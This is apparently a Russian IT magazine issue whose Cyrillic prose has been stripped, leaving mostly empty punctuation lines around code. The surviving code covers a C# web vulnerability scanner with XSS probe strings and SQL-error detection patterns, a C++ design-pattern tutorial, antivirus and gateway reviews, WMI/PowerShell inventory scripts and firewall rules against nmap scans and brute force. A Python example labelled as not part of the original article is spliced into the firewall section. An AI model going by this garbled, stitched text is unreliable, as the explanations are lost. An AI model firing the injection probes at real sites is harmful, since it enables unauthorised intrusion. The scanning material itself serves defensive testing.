@WebService Class, , -, CodeBehind,


- .
- ICholeScaner.cs
ICholeScaner [WebMethod].
.NET Framework
.
[WebMethod]
public string StartScan(string domen)
{
//

-
( , ) ,
, , - ,
(), HTTP SOAP. SOAP XML-
HTTP .
- StartScan,
,
. URL ,
, www.site.com/icholescaner.asmx,
StartScan, SOAP- HTTP-. :
1. SOAP-, ;
2. ;
3. SOAP-, ;
4. HTTP-.


, ,
,
. ,
( JavaScript-),
, .
XSS-: .
: ,
,
(,
). , , ,
, .
,
, , -.
, .
, ,
, . , ?
, .
, URL- ,

- .
:
HTML-
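// Build the request: target URL plus the query string with the parameters
WebRequest request = WebRequest.Create(Url + "?" + Parametrs);
// Send it and wait for the response
WebResponse response = request.GetResponse();
// Read the response body (the HTML of the page) into Content
StreamReader reader = new StreamReader(response.GetResponseStream());
Content = reader.ReadToEnd();
reader.Close();
response.Close();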

,
, ,
. :
- HTML- "/script.
php?a=abcd&b=1234", script.php .
.

,
, .
, ,
,
,
JavaScript- ..
XSSrequest. :
string[] XSSrequest =
{ "<script>alert()</script>",
"<IMG SRC=\"javascript:alert();\">",
"<IMG SRC=javascript:alert(&quot;XSS&quot;)>",

, JavaScript-.
, HTML-,
, .

SQL-INJ, PHP-INC

, ,
, .
, , SQL- ,
.
, ,

, ,
. ,
,
( HTML- + ).
SQL-,
:
string[] SQLErrors = { "mysql_fetch",
    "mysql_query", "\\[odbc", "mysql error",
    "you have an error in your sql syntax",
    "odbc drivers error", "\\[microsoft sql"
    // ...
};

XSS-

SQL-,
, , . , ,
.

- . - ,
()
. - , -
, -
, ,
. - ,
,
,
.
!. z


CODING
deeonis deeonis@gmail.com

C++

3- .
, .
.

.
,
.
- - , .

- .

-
healthValue, , ,
.

-, healthValue
:
healthValue
class GameCharacter {
public:
    // Returns the character's health;
    // derived classes may redefine it
    virtual int healthValue() const;
};

,
healthValue ,
,
.
,
.


.

,

.

healthValue ,
, doHealthValue,
.

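class GameCharacter
{
public:
    int healthValue() const
    {
        // ... work done before the calculation
        int retVal = doHealthValue();
        // ... work done after the calculation
        return retVal;
    }
private:
    // Derived classes may redefine this function,
    // which holds the default health calculation
    virtual int doHealthValue() const
    {
        return 0; // placeholder: the body is elided on the page
    }
};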

, -.
non-virtual
interface idiom (NVI).
.
healthValue
.
NVI ,

. ,
,
. , ,
. ,
, ..
, .
,
.
,
doHealthValue , , , , . ,
:

.

-
, . ,
doHealthValue
, . ,
NVI .



NVI
, , ,
-
.
, ,
, . ,
,
. , ,
.

// Forward declaration
class GameCharacter;
// Default health calculation function
int defaultHealthCalc(const GameCharacter&);
class GameCharacter {
public:
    typedef int (*HealthCalcFunc)(const GameCharacter&);
    explicit GameCharacter(HealthCalcFunc hcf = defaultHealthCalc)
        : healthFunc(hcf)
    {}
    int healthValue() const
    { return healthFunc(*this); }

private:
    HealthCalcFunc healthFunc;
};

, .


, GameCharacter,
.
,
.

class EvilBadGay: public GameCharacter {
public:
    explicit EvilBadGay(HealthCalcFunc hcf = defaultHealthCalc)
        : GameCharacter(hcf)
    {}
    // ...
};
// Health calculation functions with different behaviour
int loseHealthQuickly(const GameCharacter&);
int loseHealthSlowly(const GameCharacter&);
// Characters of the same type
// with different health calculations
EvilBadGay ebg1(loseHealthQuickly);
EvilBadGay ebg2(loseHealthSlowly);

,

. ,
GameCharacter - setHealthCalculator,
.
. , -
GameCharacter, ,
, .
,
, . , .
, ,
, ,
GameCharacter. , ,
. ,
- ,
.
,
.


tr1::function
tr1::function
-


. tr::function
( ,
-),
. tr1::function:
tr1::function
#include <tr1/functional> // <functional> on compilers that ship TR1 there

class GameCharacter;
int defaultHealthCalc(const GameCharacter&);
class GameCharacter {
public:
    // HealthCalcFunc is any callable entity that can be called
    // with anything compatible with a GameCharacter and that
    // returns anything compatible with an int
    typedef std::tr1::function<int (const GameCharacter&)> HealthCalcFunc;
    explicit GameCharacter(HealthCalcFunc hcf = defaultHealthCalc)
        : healthFunc(hcf)
    {}
    int healthValue() const
    {
        return healthFunc(*this);
    }

private:
    HealthCalcFunc healthFunc;
};

, HealthCalcFunc typedef, tr::function. ,


. HelthCalcFunc
, .
,
const GameCharacter&, int.
, GameCharacter ,
. , ,
,
:
tr1::function
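// Health calculation function;
// note the non-int return type
short calcHealth(const GameCharacter&);
// Function object class for
// the health calculation
struct HealthCalculator {
    int operator() (const GameCharacter&) const
    { return 0; /* placeholder: the body is elided on the page */ }
};
class GameLevel {
public:
    // Member function that calculates health;
    // note the non-int return type
    float health(const GameCharacter&) const;
    // ...
};
class EvilBadGay: public GameCharacter {
    // ...
};
class EyeCandyCharacter: public GameCharacter {
    // ...
};

// Character that uses a function for its health calculation
EvilBadGay ebg1(calcHealth);

// Character that uses a function object; the extra parentheses keep
// the line from being parsed as a function declaration
EyeCandyCharacter ecc1((HealthCalculator()));

GameLevel currentLevel;

// Character that uses a member function; _1 comes from std::tr1::placeholders
EvilBadGay ebg2(
    std::tr1::bind(&GameLevel::health,
                   currentLevel,
                   _1)
);

ebg2 - GameLevel.
GameLevel::health , ( GameCharacter), ,
GameLevel ,
this.
. GameLevel::health, -
,
.
ebg2 GameLevel
currentLevel, GameLevel::health.
tr1::bind ,
ebg2 GameLevel
currentLevel.

- , . :

// Forward declaration
class GameCharacter;
class HealthCalcFunc {
public:
    // ...
    virtual int calc(const GameCharacter& gc) const
    { return 0; /* placeholder: the body is elided on the page */ }
    // ...
};

HealthCalcFunc defaultHealthCalc;

class GameCharacter {
public:
    explicit GameCharacter(HealthCalcFunc *phcf = &defaultHealthCalc)
        : pHealthFunc(phcf)
    {}

    int healthValue() const
    { return pHealthFunc->calc(*this); }
    // ...
private:
    HealthCalcFunc *pHealthFunc;
};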

GameCharacter , EvilBadGay
EyeCandyCharacter .
HealthCalcFunc ,
SlowHealthLooser FastHealthLooser.
GameCharacter HealthCalcFunc.
,

HealthCalcFunc.

: ,
, .
C++ .
! z


SYN/ACK
grinder grinder@synack.ru




. , , .
.
,
, ,
,
.
?

, ,
,
: , , .
,
,
.

,
, , , ,
( ).


.
,
.
,
,
.

-,


.
SQL,
,
,


.
-
.
.
:
,
(, IIS SQL
Server), , . , ,
.
.

:
Kaspersky Open Space Security (KOSS, kaspersky.ru) ;
Dr.Web Enterprise Suite (ES, drweb.com) Windows, Unix ;
ESET NOD32 Smart Security Business Edition (SSBE, esetnod32.ru) Windows Linux;
avast! Enterprise Suite (avast.com/ru-ru) Windows, Windows Linux , Kerio Mail/WinRoute;
Symantec Endpoint Protection (SEP, symantec.com/ru) Symantec AntiVirus Corporate Edition .


Kaspersky Open Space Security
KOSS ( 20),
:
(Windows XP Se7en 32/64-bit,
Linux), (Symbian), , (Sendmail, Qmail, Postfix,
Exim, Exchange, Lotus)
(Windows, Linux, NetWare). Kaspersky
Administration Kit. , .

, .

,
.
Windows/Linux Workstation,
,
, IDS/IPS, ,
.
, KOSS
Cisco NAC Microsoft NAP ( NAP
, ][
12.2008).

Dr.Web Enterprise Suite


Dr.Web ES 5.0
Windows (Win95 Win7, 32-bit, 32/64-bit),
Unix (Linux, FreeBSD 7.1, Solaris).

, ,
. , , Dr.Web . ( )
, . /
-. 5.0
.
, . ,
,
, - (
).
NAP Validator, NAP.
ESET NOD32 Smart Security Business Edition
ESET , , . NOD32,
. ThreatSense,
/
, . -. ThreatSense
(MS Outlook,
Thunderbird, The Bat! ).
Smart Security . , ,

,

.
32 64- Windows 2000 Se7en (
Server), Linux/BSD/Solaris Novell Netware. ESET Remote
Administrator.

avast! Enterprise Suite


ALWIL Software, avast! Free antivirus.
avast! Professional Edition ( NetClient Edition
ADNM),
, .
,
, P2P IM-,
-. Network Shield, ,
.
Windows 95 Vista, 64- . .
, : Windows ( Exchange,
ISA, Sharepoint ..) Linux/Unix, Kerio PDA.
avast! Distributed
Network Manager (ADNM).
Symantec Endpoint Protection
SEP Norton Antivirus.
, ,
32/64- Win 2k Se7en ( ), Linux, Novell
Open Enterprise Server (OES/OES2) VMWare ESX. , , :
, , , IPS . -


Dr.Web ES

Kaspersky Administration Kit


VxMS (Veritas Mapping Service)
;
Proactive ThreatScan
.
,
Symantec Endpoint Protection Manager,
, , ,
,
.
Network Access Control,

. ,


.
.


Kaspersky Open Space Security
.
Kaspersky
Administration Kit,
(),
( ) . , ,
,
,

Microsoft Forefront
Client Security

, . Microsoft Forefront
Microsoft Forefront Client Security ( Microsoft
Client Protection, microsoft.com/forefront/clientsecurity/ru/ru), . , ,
.
Windows Defender OneCare,
, .
Win2k3/Win2k8, Win 2k+. ( ) .
Microsoft. Windows Update ( WSUS),
GPO.
, , .
, .


.
,
.
. ,
;
()
.
Win 2k/2k3/2k8/XP/Vista,
MS SQL Server, MSDE/Express
MySQL. ,
MSDE
.

.
,

.
,
.

,
,
.

Dr.Web Enterprise Suite


, Dr.Web
;
,
. , SQL
.
Kaspersky Administration Kit.
,
.
( ),

.

Java, Windows
2k/XP/2k3/2k8, Linux, FreeBSD Solaris.

- Dr.Web
Enterprise Suite
IntDB
( ) MS SQL
Server CE, Oracle ( ODBC), Linux
PostgreSQL.

. ,
,
. -
,
. , 9080/9081 (HTTP/HTTPS).
Java.

ESET NOD32 Smart Security Business Edition



ESET Remote Administrator (ERA),
(ERAS) (ERAC), .
, .

,
. ERAS,
.
, ; ,
; . ,
, - - -
. ESET Remote Administrator Server
( 2222) .
ERAC.
,
, .
ESET
XML-, , ERAC
. Active
Directory. ESET SysInspector,
(,
, ..), ESET SysRescue,
NOD32 ( WAIK,
][ 01.2009).
ERAC , -
. ERAS
Windows NT4 2k8/Se7en

ERAC
( ), ,
NT4. MS Access, MS
SQL Server, Oracle MySQL. , ERAS
( ),

.

avast! Enterprise Suite


avast! ADNM
Management Server,
.
,
32/64- WinNT/2k/XP/2k3/Vista/2k8.
MS
SQL' .
:
(dedicaded) . MSDE 2000 (
1000 ), MS SQL Server 2k/2k5 ( 2k5 Express
Edition).
: PUSH POP. ,
, ,
.
(AMS service, AvEngine.
exe) , ,
HTTP/S ( httpd.exe).
.
.
, , .

.
,
avast!
.
Administrator admin.

WARNING

warning
MSDE 2000 64-
.

DVD
dvd



,

ESET NOD32 SSBE.

HTTP://WWW
links
kaspersky.ru

drweb.com
ESET NOD32
esetnod32.ru
avast! avast.com/ru-ru
Symantec
symantec.com/ru


avast! ADNM
Symantec Endpoint Protection
Symantec Endpoint Protection
: Manager (), Console Database. Manager', .
Win2k/XP/2k3/2k8 (32/64-bit). ,
, Vista/Se7en. SQL' ( Sybase),
100
( ).

SQL- MS SQL Server 2kSP4/2k5SP2/2k8.
IIS, Manager.
( 510 ), .
Java-, ( ). , .
. ,
, ,
,
SEP.

Symantec' . 30 : , IP-,
CPU, BIOS .


Symantec Endpoint Console



, ,
,
. ,
.z

SYN/ACK
_ssh3r1ff- ssh3r1ff@gmail.com



IDECO ICS
. ? , , . . , .
.
, , ,
: .
- Ideco ICS.
, -
.
-
(
,
), Ideco.
(,

) ,
.
,
Ideco ICS
VMware Player. , ,
.


?
Linux,
,
. -
, , ,
,
. ,
-
,
:). ,


,
, ,
,
. ,

. ,
, , ... !


][ (
PDF- ). Ideco Control
Server .

?
? :) . ,
.
,
, e-mail,
. Ideco
.

?
. Ideco ICS
Linux 2.4 (, )
, -

: Apache,
ClamAV, Courier, Cyrus, Postfix, MySQL ..

, ,
- ,
. : ,
Ideco,
VPN, DHCP, DNS, FTP, NTPD, Jabber
SMTP/POP3 IMAP-.
Joomla phpbb
-.
all in one
. ,
? :
, ,
.
. C 2.4
.
, , SkyStar3?
2.6 , 2.4
. ,
: ,
DVB-. ,
, ,
. 3G WiMax-,
USB. , .

eBox (ebox-platform.com), , .
Ubuntu ,
. C Ideco ,
, , ,
WiMax Yota.

?
: . , , Ideco .
:
NAT, -, , ,
firewall, , ,
. , ,
.
- .
,
memtest'. ? ,
, Ideco ? :) ,
, curses-, .
,
, .
,
, ,
. Ideco ICS
. 1.5 CPU, 256 RAM,
.
,
. ,

curses- IP-.
Ideco IS , ,
-. IP',
, ( servicemode)
. ,
, ,
. , ,
, , . WAN. , L2TP. , Ethernet- PPPOE,
VPN (PPTP) , L2TP .
PPTP . ADSL
WiMAX Ethernet,
USB-, , Ideco .
:
. ,
,
,
Ideco ICS DNS. ,
, .

-

- AJAX ( Opera -
). , Ideco ICS
: ,
.
.
. ,


Ideco ICS
,
: , (
, , ), , ,
, .
DNS
. -
, . : -,
FAQ, IdecoAgent, VPN Win98/2000/
XP/2003/Vista/7.
,
FireFox,
IE, Opera, Miranda Thunderbird.
, .
.



, ,

.
,
: IP, IP+MAC,


PPPoE PPTP.
(, )

IdecoAgent,
. ,
Active Directory, Ideco ( LDAP).
, :).

.
:).

, ,
.
-
.
,
:). ,
, ,
,

. ,
,
NAT,
VPN , , ,

, Jbber e-mail
.
.
,
. ,
(--!).


,
,


:). , , . :). , . ,
ICS Manager,
Ideco
ICS. ? :) . ,

.
,
. ,
Ideco ICS . , IP-
.
(
).
,
, . ,
,
,
. , -
.

. .
IP- (
-, ),
IP-,
.
,
, . ,
, .

firewall
Squid.
, - - .
, , ,
, :).


, ,
-, :
chroot
. ,
Linux
( , , ACL-
), , . ,
,
10 .
SSH,
.
, IP .
firewall: ( ) , .
, iptables.
: IP , , , , , , , .
, /
.
,
, 15 .

.
.
,
. ,
, ,
- ,
. Ideco
. .
-> . ,
, .
, :).
.
-> ->
CD CD ,
.


INFO

info


Ideco ICS
?
, .
eBox Ideco ICS, . eBox
, .
, ,
. ,
,
. ,
- ,
? , Ideco
. , ,
- , ,
. , ,
, , ,
. , :
, ,
,
. , ,
. , - . : Ideco ICS
, - ,
,
, . Ideco ICS
.
.z





][
07.2009.

Linux
, ][
2010 .

DVD
dvd



,


Ideco ICS
.

HTTP://WWW
links

Ideco ICS
ideco-software.ru


SYN/ACK
grinder grinder@synack.ru

,
IT-
. ,
. , , . ,
.
WMI POWERSHELL
WinNT 4.0SP4

WMI
(Windows Management Instrumentation,
Windows).
,
( 15).
Win2k+ .
WMI Windows,
Se7en. WMI ,
.

VBScript, JScript ,
,
PowerShell,

( PS ][ 09.2009
05.2010).
BIOS :
PS> Get-WMIObject Win32_BIOS -computerName synack.ru

, '-computerName' .
,
.
,


Get-WMIObject ,
.

.
. ,
CPU:
PS> Get-WMIObject Win32_Processor

, , ,
:
PS> Get-WmiObject Win32_ComputerSystem | Select Manufacturer, Model

PS> Get-WmiObject Win32_OperatingSystem | Select CSName,BuildNumber,ServicePackMajorVersion


, Export-CliXML C:\check.xml,
:
PS> Import-CliXML C:\check.xml | Out-GridView

Win32_* MSDN Win32_Classes


(http://msdn.microsoft.com/en-us/library/aa394084%28v=VS.85%29.aspx). . , ,
disk:

, :
PS> Get-WmiObject Win32_Baseboard | Select Manufacturer, Name, Product | ft -a

Win32_ComputerSystem,
Win32_ComputerSystemProduct Win32_
OperatingSystem
:
PS> "127.0.0.1", "synack.ru", "pc01" | Check-Online |
    Foreach-Object { Get-WMIObject Win32_ComputerSystem -computerName $_ }

PS> Get-WmiObject -List | where {$_.name -match "disk"}


,
WMI-
,
.
HTA-
Hardware Inventory (www.robvanderwoude.com/hardware.php) -.
.
,
( WMI- VBScript).

,
. Computer Inventory Script
(CompInv), powershellpro.com,
,
Excel' .
, ,
.
,
, .
.
, , Yes Would you like to use an
alternative credential?, .
,
SchTasks. :
> SchTasks /CREATE /TN CheckScript /TR "powershell.exe -noprofile -executionpolicy Unrestricted -file check.ps1" /IT /RL HIGHEST /SC DAILY

CheckScript,
PS- check.ps1, .
NetPoint (www.neutex.net) PS- (GetNet*),
. ,
:
PS> Get-NetLogicalDisk -DriveType "Local Disk" |
    where { $_.FreeSpace / $_.Size -lt .10 } |
    % { $_.ComputerSystemName }

:
PS> Get-NetProgram -System synack.ru -Uninstalled $False |
    % { $_.DisplayName } | sort -unique

20 .
NetPoint Express Edition,
32/64- WinXP/2k3/2k8/Vista/Se7en,
. NetPoint PS 2.0, IIS
SQL- ( Express Edition).
, , :
PS> Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* |
    Select-Object DisplayName,Publisher | Out-GridView

Out-GridView .


WMI/PowerShell ,

. , , , .
, Microsoft
SCCM (System Center Configuration Manager),
08.2009, 09.2009 01-02.2010. , *nix ,
, , WMI
. ,
. (
), ,
.
MYZCI
, zCI (zci.sf.net),
,



OutGridView
,
mysqlscript.sql, engine.

:

WMI-
. , ,
. ,
- SQL-
.
MyZCI (sf.net/projects/myzci)
zCI. ,
zCI :
,
(,

GLPI

) . MyZCI PHP ( PECL, PHP Extension


Community Library) MySQL.
myzci-1.2.1.zip
- zciconfig.php
MySQL:
$ sudo nano zciconfig.php
return dbx_connect(DBX_MYSQL,"localhost","zci","zci","passwd");

GLPI (Gestion Libre de Parc Informatique, glpi-project.org) , .


,
, . OCSNG,
, -. , GLPI OCSNG. .
- OCSNG .
OCSNG, .
GLPI , , , . IT- . ,
. GLPI
. , ,
, .
PDF, CSV
SLK. iCal, Webcal.
,
(plugins.glpi-project.org). OCSNG
Cacti Nagios.
GLPI *nix .
, PHP
- MySQL.


$ sudo nano mysqlscript.sql


create database zci;
...
grant all on zci.* to 'zci'@'localhost' identified by 'passwd';
# ,
# grant select,delete,insert,update on zci.* to 'zci'@'%' identified by 'zci';

$Lang ru
langconfig.php.
Windows-
Windows Script Host, Linux
lshwclient Java.
add-ons engine. MS
Windows Scripting Host 5.6 MS WMI Core 1.5,

Win95/98/NT4.
takedata.js lshwclient.java
MyZCIpath
MyZCIserver, URL .
. , install.sh,
Linux,
lshw, jdk read-edid (
) .
Java- cron.
MyZCI
,
.

MyZCI.
.

.
,
,

DVD
dvd

Hardware Inventory
,
(, ), .
(, ) .

OCS INVENTORY NG
OCS Inventory NG (OCSNG, Open Computers and
Software Inventory New Generation, ocsinventory-ng.org)

,
, , .
.
-.
Windows 95

OCSNG/GLPI

OCSNG ,
, ,
, Windows, .
, OCSNG ISO-8859-1 ( CP1251), GLPI UTF8. OCSNG
-> GLPI . :
1. . ,
export.function.php
ttf2pt1 ,
UTF8.
2. OCSNG UTF8.

Windows.
ftp://linvinus.ru/ocs. deb- Ubuntu/Debian.
, inc/ocsng.class.php
$this->dbenc="latin1";
$this->dbenc="utf8"; /etc/php5/apache2/
php.ini default_charset =
"utf-8".

,
OCSNG
2k8R2, Linux, Mac OS X, *BSD, Solaris, IBM AIX HP-UX.

(management server) XML-,
Zlib.
HTTP/HTTPS, firewall' .
"IP discovery", , ,
, (, , web- ..)

.
Windows C++, *nix
Perl .
OCSNG ,

. (MySQL) , , :
HTTP
-
(Apache 1.3.X/2.X Perl, Debian/Ubuntu
libapache-dbi-perl);

- ( - SSL);
(- PHP ZIP GD).
OCSNG , Win2k/XP/2k3, Linux,
*BSD, Solaris, IBM AIX MacOS X.

OCSNG
, .
. setup.sh, ,

, .
Debian/Ubuntu :
$ sudo apt-get install libapache2-mod-perl2 \
    libdbi-perl libapache-dbi-perl libdbd-mysql-perl \
    libsoap-lite-perl libxml-simple-perl \
    libnet-ip-perl libcompress-zlib-perl php5-gd

XML::Entities CPAN:



, ,

OCSNG + GLPI.

HTTP://WWW
links

Win32_*

MSDN
Win32_Classes
msdn.microsoft.com

NetPoint neutex.net
MyZCI
sf.net/projects/myzci
zCI
zci.sf.net
OCSNG
ocsinventory-ng.org

INFO

info

,

,
WMI
,


.


OCSNG

$ sudo cpan -i XML::Entities


-. , OCSNG, ,
post_max_size upload_max_
filesize /etc/php5/apache2/php.ini ( 8 2 )
ocsinventory-reports.conf.
http://localhost/ocsreports/install.php,
.
ocsweb ocs ocs.
,
. Linux Perl (XML Zlib) dmidecode.
$ sudo apt-get install libcompress-zlib-perl libnet-ip-perl \
    libnet-ssleay-perl libwww-perl libxml-simple-perl \
    po-debconf ucf dmidecode pciutils

Perl'
:
$ tar xzvf Ocsinventory-Agent-1.1.2.tar.gz
$ cd Ocsinventory-Agent-1.1.2
$ perl Makefile.PL
$ make
$ sudo make install

. , (
), cron.
.
Success!,
. -, . /var/lib/ocsinventory-agent XML-,
.
, :
$ ocsinventory-agent -l /tmp --debug --server http://ocsng-server/ocsinventory

.
Windows . logon .


GLPI OCSNG
OCSNG.
, . :
IP- OCSNG , ,
, Immediately launch inventory.
.

OCSNG
, , , . .
Add column 23 .
, .
.
, OCSNG
(bat, vbs ..)
. Deployment Build
New package building: , Priority ( )
Action. :
- Store ;
- Execute ;
- Launch .

User notifications .
Deployment Activate.
URL . ,
, Customization
Add package.
Affect. Customization,
Activate.
OCSNG , ,
. ,
ocsinventory-agent.


. , , , ,
.z

j1m@synack.ru

IPTABLES, IPFW PF
, , .
, 99% .

.



.

() (, ssh).



,

.
nmap,

.
nmap,
:
nmap,

-sT TCP-
;
-sS SYN/ACK-,

;
-sU UDP-;
-sF FIN;
-sX FIN, PSH URG;
-sN .



.
,
. , ssh, samba apache,
-
-,
:
iptables
outif="eth1"
iptables -F
# Loopback traffic is always allowed
iptables -A INPUT -i lo -j ACCEPT
iptables -i $outif -A INPUT \
    -m conntrack \
    --ctstate ESTABLISHED,RELATED \
    -j ACCEPT
iptables -i $outif -A INPUT -p tcp \
    --dport 80 -j ACCEPT
# -P sets the policy of the whole chain and takes no -i option
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
ipfw
outif="rl0"
ipfw add allow ip from any to any \
    via lo0
ipfw add allow ip from me to any \
    via $outif
ipfw add allow tcp from any to me \
    established via $outif
# The destination port follows the destination address
ipfw add allow tcp from any to me 80 \
    via $outif
ipfw add deny ip from any to any \
    via $outif
pf
outif="rl0"
set skip on lo0
block all
pass out on $outif from $outif \
    to any keep state
pass in on $outif proto tcp from any \
    to $outif port 80



(loopback),
(, ,

), 80- ,
,
. ,
iptables ipfw
(established), pf
keep state
,
.
-,

,
,
.
(
nmap '-sT', '-sS' '-sU') ,
, , '-sN', '-sF'
'-sX', ,
.
.


# FIN scan
Linux> iptables -A INPUT -p tcp \
    -m tcp \
    --tcp-flags FIN,ACK FIN -j DROP
FreeBSD> ipfw add reject tcp from any to any \
    not established tcpflags fin
# X scan
Linux> iptables -A INPUT -p tcp -m tcp \
    --tcp-flags FIN,SYN,RST,PSH,ACK,URG FIN,SYN,RST,PSH,ACK,URG \
    -j DROP
FreeBSD> ipfw add reject tcp from any to any \
    tcpflags fin,syn,rst,psh,ack,urg
# N scan
Linux> iptables -A INPUT -p tcp -m tcp \
    --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE -j DROP
FreeBSD> ipfw add reject tcp from any to any \
    tcpflags !fin,!syn,!rst,!psh,!ack,!urg
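
Added example (not part of the original article): a small Python model of the iptables `--tcp-flags mask comp` test, applied to the three Linux DROP rules above and to constructed flag combinations, to check which rule catches which packet and that ordinary handshake, data and close segments pass. The rule names and sample labels are assumptions made for the illustration.

```python
"""Model of iptables '--tcp-flags mask comp' for reviewing flag-based DROP rules."""

# TCP flag bits as they appear in the TCP header
FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
ALL = "FIN,SYN,RST,PSH,ACK,URG"


def bits(spec):
    """Turn 'FIN,ACK', 'ALL' or 'NONE' into a bitmask."""
    if spec == "NONE":
        return 0
    if spec == "ALL":
        spec = ALL
    value = 0
    for name in spec.split(","):
        value |= FLAGS[name.strip().upper()]
    return value


def tcp_flags_match(packet_flags, mask, comp):
    """iptables semantics: among the flags named in mask,
    exactly the flags named in comp are set in the packet."""
    return (packet_flags & bits(mask)) == bits(comp)


# The three Linux rules of this section (names are labels for this example only)
RULES = [
    ("fin-rule", "FIN,ACK", "FIN"),
    ("x-rule", ALL, ALL),
    ("n-rule", ALL, "NONE"),
]

# Constructed flag combinations: scan probes as listed for the nmap options
# earlier in the article, followed by ordinary traffic
SAMPLES = {
    "nmap -sF probe": "FIN",
    "nmap -sX probe": "FIN,PSH,URG",
    "nmap -sN probe": "NONE",
    "all six flags set": ALL,
    "handshake SYN": "SYN",
    "handshake SYN+ACK": "SYN,ACK",
    "data segment": "PSH,ACK",
    "normal close": "FIN,ACK",
    "reset": "RST",
}


def verdict(packet_spec):
    """Return the name of the first rule that drops the packet, or 'pass'."""
    flags = bits(packet_spec)
    for name, mask, comp in RULES:
        if tcp_flags_match(flags, mask, comp):
            return name
    return "pass"


def run_samples():
    """Evaluate every constructed sample against the rule set."""
    return {label: verdict(spec) for label, spec in SAMPLES.items()}


if __name__ == "__main__":
    for label, result in run_samples().items():
        print(f"{label:20} -> {result}")
```

A FIN+PSH+URG probe is dropped by the FIN rule (FIN set, ACK clear); the six-flag rule matches only segments that carry all six flags.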

OpenBSD
/etc/pf.conf:
scrub in all

scrub ,
, .
scrub
( )
DoS-.
SYN/ACK-,
nmap- '-sS',
(OS Fingerprint), pf iptables/netfilter
( 1.4.6).
( '-sT') nmap ,
( ),
SYN/ACK- nmap ,
, . -



:
OpenBSD> block in quick from any os NMAP
Linux> iptables -I INPUT -p tcp -m osf --genre NMAP \
-j DROP

osf iptables/netfilter ,
OpenBSD (/etc/pf.os),
.
, nmap ( '-O').
,
'-sT'. ?
. , .
, .
. iptables ,
,
:
iptables
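# Source seen at least 10 times within the last hour: leave the chain
iptables -A INPUT -m recent --rcheck \
    --seconds 3600 --hitcount 10 --rttl -j RETURN
# Source seen at least 2 times within the last minute: leave the chain
iptables -A INPUT -m recent --rcheck \
    --seconds 60 --hitcount 2 --rttl -j RETURN
# Record the source address
iptables -A INPUT -m recent --set
# Packets that leave the chain meet the default policy
iptables -P INPUT DROP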

xtables-addons, patch-omatic, PSD (Port Scan Detect), scanlogd.


:

FWBuilder: GUI
iptables, ipfw, pf
ipf


# iptables -A INPUT -m psd -j DROP

, ipfw pf
, ,
PortSentry scanlogd.

ICMP-

ICMP-,


(, ).
ICMP-:
ICMP-
0 echo reply
3 destination unreachable
4 source quench
5 redirect
8 echo request
9 router advertisement
10 router solicitation
11 time-to-live exceeded
12 IP header bad
13 timestamp request
14 timestamp reply
15 information request
16 information reply
17 address mask request
18 address mask reply

, ICMP-
,
, .

ICMP- 0, 3, 4, 11 12,
3, 8 12.
:
ICMP-
# --icmp-type takes one type per rule, hence the loops
Linux> for t in 3 8 12; do iptables -A INPUT -p icmp \
    --icmp-type $t -j ACCEPT; done
Linux> for t in 0 3 4 11 12; do iptables -A OUTPUT -p icmp \
    --icmp-type $t -j ACCEPT; done
FreeBSD> ipfw add allow icmp \
    from any to $outif in \
    via $outif icmptypes 3,8,12
FreeBSD> ipfw add allow icmp \
    from $outif to any out \
    via $outif icmptypes 0,3,4,11,12
OpenBSD> pass in inet proto icmp \
    from any to $outif \
    icmp-type { 3, 8, 12 } keep state
OpenBSD> pass out inet proto icmp \
    from $outif to any \
    icmp-type { 0, 3, 4, 11, 12 } \
    keep state

TARPIT
,
conntrack:
# iptables -t raw -I PREROUTING -p tcp --dport 25 -j NOTRACK

ICMP, -,
.


, , ,
.
,

.
, IP-.
iptables:

iptables
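# Create the chain that checks connection attempts
iptables -N brute_check
# Drop the source if this is its third or later attempt within 60 seconds
iptables -A brute_check -m recent \
    --update --seconds 60 \
    --hitcount 3 -j DROP
# Otherwise record the source address and accept the connection
iptables -A brute_check -m recent \
    --set -j ACCEPT
# Flush the INPUT chain
iptables -F INPUT
# Packets of connections that are already established are accepted
iptables -A INPUT -m conntrack \
    --ctstate ESTABLISHED,RELATED -j ACCEPT
# Send every new connection to port 22 through brute_check
iptables -A INPUT -m conntrack \
    --ctstate NEW -p tcp \
    --dport 22 -j brute_check
iptables -P INPUT DROP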

pf:


iptables

WARNING
warning

nmap osf,

,

: SunOS 4.1.x,
Tru64 6.1, TOPS-20
version 7, ExtremeWare
4.x, SymbianOS 6048,
Sega Dreamcast
Dreamkey 3.0.

HTTP://WWW

pf
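# Table for the addresses of brute-force sources
table <bruteforcers> persist
# Block everyone listed in the table
block in quick from <bruteforcers>
# Put sources that exceed the connection rate to port 22 into bruteforcers
pass in on $ext_if inet proto tcp to $outif \
    port 22 flags S/SA keep state \
    (max-src-conn-rate 60/2, \
    overload <bruteforcers> flush)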

ipfw ,
,
PAM,
sshguard.

( )
links
DoS- . sf.net/projects/
, sentrytools
(,
PortSentry
,
www.openwall.com/
)
scanlogd scanlogd
( ,
). ,
,
.
INFO
, ,

(, ).
info
, ,
,
.
DoS/DDoS
TCP- ,


. , ,
,
,
- , UDP,
.
][ 2009 .


netfilter Linux
, .

, (, ssh)
(
).
, , ( ).
. , , .. .
,
,
. ,
.
,

, :
Linux> iptables -A INPUT -i $outif \
    -s 192.168.1.0/24 -j DROP
FreeBSD> ipfw add deny ip from \
    192.168.1.0/24 to any via $outif
OpenBSD> block in on $outif from \
    192.168.1.0/24 to any

pf

www.netfilter.org: iptables/netfilter
(
) ipfw pf
Linux:
Linux> echo 1 > /proc/sys/net/ipv4/conf/all/rp_filter
FreeBSD> ipfw add deny ip from any to any not antispoof in
OpenBSD> antispoof quick for $ext_if

. ,
,
.

IPTABLES

iptables/netfilter,
.
, (port knoking).
,
.
, SSH 10 27520-
:
iptables port knocking
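# Create the chain that checks for a preceding knock
iptables -N knock
# Accept the connection if the source knocked within the last 10 seconds
iptables -A knock -m recent --rcheck --seconds 10 \
    -j ACCEPT
# Flush the INPUT chain
iptables -F INPUT
# Accept packets of connections that are already established
iptables -A INPUT -m conntrack \
    --ctstate ESTABLISHED,RELATED -j ACCEPT
# Send new connections to port 22 through the knock chain
iptables -A INPUT -m conntrack --ctstate NEW \
    -p tcp --dport 22 -j knock
# A knock on port 27520 records the source address
iptables -A INPUT -m conntrack --ctstate NEW \
    -p tcp --dport 27520 -m recent --set
# A knock on a neighbouring port removes the source address again
iptables -A INPUT -m conntrack --ctstate NEW -p tcp \
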